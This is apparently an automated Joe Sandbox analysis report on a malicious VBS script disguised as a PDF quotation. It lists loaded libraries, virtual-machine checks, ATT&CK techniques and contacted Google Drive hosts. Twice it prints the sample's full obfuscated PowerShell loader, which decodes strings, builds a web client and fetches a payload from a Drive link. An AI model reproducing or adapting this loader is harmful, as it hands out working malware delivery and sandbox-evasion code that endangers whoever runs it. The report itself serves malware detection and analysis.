      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.2635802751.000001D676AE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdbP source: powershell.exe, 00000002.00000002.2635802751.000001D676AB9000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("Powershell.exe", ""<#Cantharidating Desinficerer afgrdern", "", "", "0");
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. 
';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5866
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3995
Source: C:\Windows\System32\wscript.exe TID: 7664 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872 | Thread sleep time: -3689348814741908s >= -30000s
Source: wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@b
Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_ServiceStoppedOKvmicvssvmicvssUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemuser-PCvmicvsstructures|S
Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicvss
Source: wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_ServiceStoppedOKvmicshutdownvmicshutdownUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemTINA-PCvmicshutdown
Source: wscript.exe, 00000000.00000003.1349349433.00000194338ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331460946.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332156430.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.00000194338D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348682345.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350748051.00000194338EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332023628.00000194358C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635802751.000001D676B76000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1332156430.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331460946.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348682345.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332023628.00000194358B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW{2yv
Source: wscript.exe, 00000000.00000002.1350657100.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349871777.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_ServiceStoppedOKvmickvpexchangevmickvpexchangeProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Data Exchange ServiceHyper-V Data Exchange ServiceWin32_ServiceWin32_ComputerSystemuser-PCvmickvpexchangeLMEM8
Source: wscript.exe, 00000000.00000002.1350657100.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349871777.00000194338E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349349433.00000194338E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
Source: wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: artbeatvmicheartbeatUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemTINA-PCvmicheartbeatS
Source: wscript.exe, 00000000.00000003.1348888983.00000194338E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

      HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi64_7752.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. 
';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (techniques listed per tactic; the digits in parentheses are the signature-count markers shown next to a technique in the report's matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting (321); Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); Exploitation for Client Execution (1); PowerShell (2); Launchd; Scheduled Task
Persistence: Scripting (321); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

Source | Detection | Scanner | Label | Link
Urgent Quotation Notification_pdf.vbs | 3% | ReversingLabs | |
      No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
https://apis.google.com | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
drive.google.com | 142.250.186.174 | true | false | | unknown
drive.usercontent.google.com | 142.250.186.33 | true | false | | unknown
Name | Source (process memory) | Malicious | Antivirus Detection | Reputation
https://www.google.com | powershell.exe | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe | false | URL Reputation: safe | unknown
http://drive.usercontent.google.com | powershell.exe | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe | false | | unknown
https://drive.usercontent.google.com( | powershell.exe | false | | unknown
https://contoso.com/ | powershell.exe | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe | false | URL Reputation: safe | unknown
https://drive.googP | powershell.exe | false | | unknown
http://cacerts.digi | wscript.exe | false | | unknown
https://drive.google.com | powershell.exe | false | | unknown
https://drive.usercontent.googh | powershell.exe | false | | unknown
https://drive.usercontent.google.com | powershell.exe | false | | unknown
http://drive.google.com | powershell.exe | false | | unknown
https://aka.ms/pscore68 | powershell.exe | false | URL Reputation: safe | unknown
https://apis.google.com | powershell.exe | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.186.33 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522522
Start date and time: 2024-09-30 09:57:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Urgent Quotation Notification_pdf.vbs
Detection: MAL
Classification: mal88.expl.evad.winVBS@4/5@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 5
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 199.232.214.172
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 7752 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: Urgent Quotation Notification_pdf.vbs
Time | Type | Description
03:58:00 | API Interceptor | 1x Sleep call for process: wscript.exe modified
03:58:03 | API Interceptor | 3996397x Sleep call for process: powershell.exe modified
                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | http://hrlaw.com.au | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://url.uk.m.mimecastprotect.com/s/r06pCLv4mSmE7ORSBfNCyUvN-?domain=clicktracking.yellowbook.com/ | malicious | Unknown | 199.232.214.172
